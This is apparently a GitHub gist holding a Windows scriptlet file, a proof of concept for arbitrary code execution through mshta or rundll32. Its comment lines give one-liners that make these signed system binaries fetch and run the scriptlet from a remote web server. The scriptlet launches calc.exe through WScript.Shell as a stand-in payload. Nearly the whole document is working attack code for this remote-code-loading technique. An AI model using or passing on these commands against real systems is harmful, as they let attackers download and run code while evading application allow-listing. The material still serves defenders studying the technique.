/scriptlet.sct
Created Nov 17, 2017
Scriplet that can be executed by mshta or rundll32 for arbitrary code execution
| <?XML version="1.0"?> | |
| <!-- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";o=GetObject("script:http://webserver/scriplet.sct");window.close(); --> | |
| <!-- mshta vbscript:Close(Execute("GetObject(""script:http://webserver/scriplet.sct"")")) --> | |
| <scriptlet> | |
| <public> | |
| </public> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
| ]]> | |
| </script> | |
| </scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment